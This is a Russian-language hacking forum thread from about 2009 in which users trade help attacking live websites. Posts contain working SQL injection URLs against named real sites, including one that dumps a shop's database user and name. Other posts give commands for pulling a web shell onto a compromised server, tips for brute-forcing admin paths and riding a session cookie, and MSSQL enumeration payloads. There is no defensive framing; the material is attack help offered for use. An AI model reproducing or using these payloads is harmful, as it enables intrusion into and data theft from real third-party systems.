Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. j0ker13

    j0ker13 Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    199
    Likes Received:
    16
    Reputations:
    5
    че за фигня?) в httpd.conf прописано DocumentRoot "/usr/local/apache/htdocs"
    а в /usr/local/apache/htdocs файлы index.html на разных языках и папка manual. походу это от установки апача но самого сайта нет(( как так?)
     
  2. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,138
    Reputations:
    350
    Правильно подозреваешь
    http://www.rfrap.ru/site/index.php?p=16+and+substring(version(),1,1)=3
    Вот материал по проведению инъекций в третьей ветке
    https://forum.antichat.ru/showpost.php?p=565034&postcount=4
     
  3. prescott

    prescott Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    132
    Likes Received:
    43
    Reputations:
    5
    Подскажите хорошую прогу которая брутит путь к админке, а то угадать самому не получается, или хотябы список самых распространенных путей.
     
  4. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    в паблике нет, но не сложно самому написать (просто проверяешь заголовки на ошибки 404 и т.д.)
     
  5. prescott

    prescott Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    132
    Likes Received:
    43
    Reputations:
    5
    Это понятно, но брутить простым перебором придется оченб долго, все равно надо словари...
     
  6. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Используй сканеры. К примеру Web Vulnerability Scanner или jsky.
     
    1 person likes this.
  7. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    как быть?

    кто подстажет каким методом можна залить сюда нормальный шелл?
    http://forum.fwuo.ru/ajax.php?vital=pwd

    и еще.. нужны кодеры который могуть писать сплоиты!
     
  8. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    здесь MS Access, нужно подбирать таблицу наугад
    http://www.eurashe.eu/RunScript.asp?page=&Article_ID=97+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+FROM+%60MSysObjects%60%00&NWS=NWS&ap=NewsDetail.asp&p=ASP%5C~Pg0.asp
    доступа к MSysObjects нет

    с помощью команды fetch
    fetch -p [src] -O [out]
     
    #4668 [Raz0r], 16 Jan 2009
    Last edited: 16 Jan 2009
  9. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    [Raz0r]
    спс за msa

    фетч пробвал... чтото не проканало) еще попробую.. елси нет есть еще варианты?
     
  10. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    как вариант выполнить пхп-код:
    php -r "file_put_contents($out,file_get_contents($src));"
     
    1 person likes this.
  11. betakley

    betakley Member

    Joined:
    29 Dec 2008
    Messages:
    18
    Likes Received:
    7
    Reputations:
    0
    доброй ночи, есть вопрос, возможно глупый, но для меня важный.
    если я войду на определенный сайт под своим аккаунтом, а затем запущу скрипт на веб-сервере своего компьютера (в том же браузере), который задаст значение переменной и проинклудит скрипт с того сайта, чтобы он увидел эту переменную как глобальную, то будет ли при этом инклуде доступна моя текущая сессия?
     
  12. preda1or

    preda1or Member

    Joined:
    27 Oct 2008
    Messages:
    170
    Likes Received:
    96
    Reputations:
    6
    если SSID в куках - да.
     
  13. betakley

    betakley Member

    Joined:
    29 Dec 2008
    Messages:
    18
    Likes Received:
    7
    Reputations:
    0
    спасибо за ответ, PHPSESSID в соответствующем куке есть, значит должно сработать :)
     
  14. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    Ваше не паленая такая ошибка)) а дальше что?
     
  15. Octave_Parango

    Joined:
    6 Nov 2008
    Messages:
    83
    Likes Received:
    11
    Reputations:
    -1
    Ребята, подскажите, как дальше, че-то не соображу:
     
    #4675 Octave_Parango, 17 Jan 2009
    Last edited: 17 Jan 2009
  16. .acme

    .acme Elder - Старейшина

    Joined:
    8 Nov 2007
    Messages:
    126
    Likes Received:
    36
    Reputations:
    4
    Octave_Parango, четвертая ветка, union почему-то не съедает.
     
  17. big_BRAT

    big_BRAT Elder - Старейшина

    Joined:
    23 Dec 2006
    Messages:
    78
    Likes Received:
    64
    Reputations:
    7
    PHP:
    http://www.naturalbodycare-nz.com/shop/list.php?ca_id=123)+UniOn+SelEct+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5/*
    standard:bodynz_admin@localhost:bodynz_shop
     
    1 person likes this.
  18. aka PSIH

    aka PSIH Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    584
    Likes Received:
    284
    Reputations:
    51
    а чем проблемма то? ))
     
    2 people like this.
  19. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Кто знает,в чём причина ?

    (select+system_user)-- - Выводит страницу,но в гайде было сказано про
    system_user(),а не system_user,но вот 1+and+1=system_user-- (Без скобок) работает.Может,я и делал неправильно,но так работает.CHAR(),к сожалению,тоже не работает.

    (select+syssdlfkf_user) - Пишет ошибку

    Значит,system_user существует.

    LIMIT не работает,но можно через нот ин:

    (select+column_name from information_schema.columns+where+table_name+not+in+(0x7573657273)-- не катит.Как потом выяснилось,с hex() тоже.

    (select+column_name+from+information_schema.columns+where+table_name+not+in+(char(117)+char(115)+char(101)+char(114)+char(115)))

    Тоже не катит.Через ТОР тоже.

    db_name() работает,но не в форме (select+db_name()),а как условие:

    1+and+1=db_name()

    Выяснил,что всего там 12 баз данных.Сразу вспомнился гайд по эксплуатации MsSql inj здесь,на форуме.Теперь вопросы:
    1)В information_schema.tables содержатся таблицы от всех 12-и баз ?На одном сервере эти таблицы или могут быть на нескольких серверах ?

    2)Каков правильный синтаксис процедур в MsSql ?

    3)Как выбрать поле из определённой таблицы через ТОР,как это было в случае таблиц ?

    ЗЫ: Мучал сервер Microsoft SQL Server 2005 на винде со вторым сервис паком.Судя по ошибке - одноядерный )В качестве системного юзера стоит 'sa',так что на процедуры забивать пока не собираюсь )))
     
  20. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Ппц.. я не знаю, что за "гайд" ты там читал... Но...

    Code:
    (select+column_name from information_schema.columns+where+table_name+not+in +(0x7573657273)--
    Ты понимаешь, что это за запрос?

    Перевожу:

    Выбрать имя колонки из information_schema, где имя таблицы не 0x7573657273.

    Если хочешь выводить колонки из таблиц:

    Code:
    (select+top+1+column_name+from+information_schema.columns+where+table_name='таблица'+and+COLU MN_NAME+not+in+('колонка','колонка2'))--
    Вот гайд, читай.

    http://forum.antichat.ru/thread30501.html
     
    #4680 R1dex, 17 Jan 2009
    Last edited: 17 Jan 2009
Loading...
Thread Status:
Not open for further replies.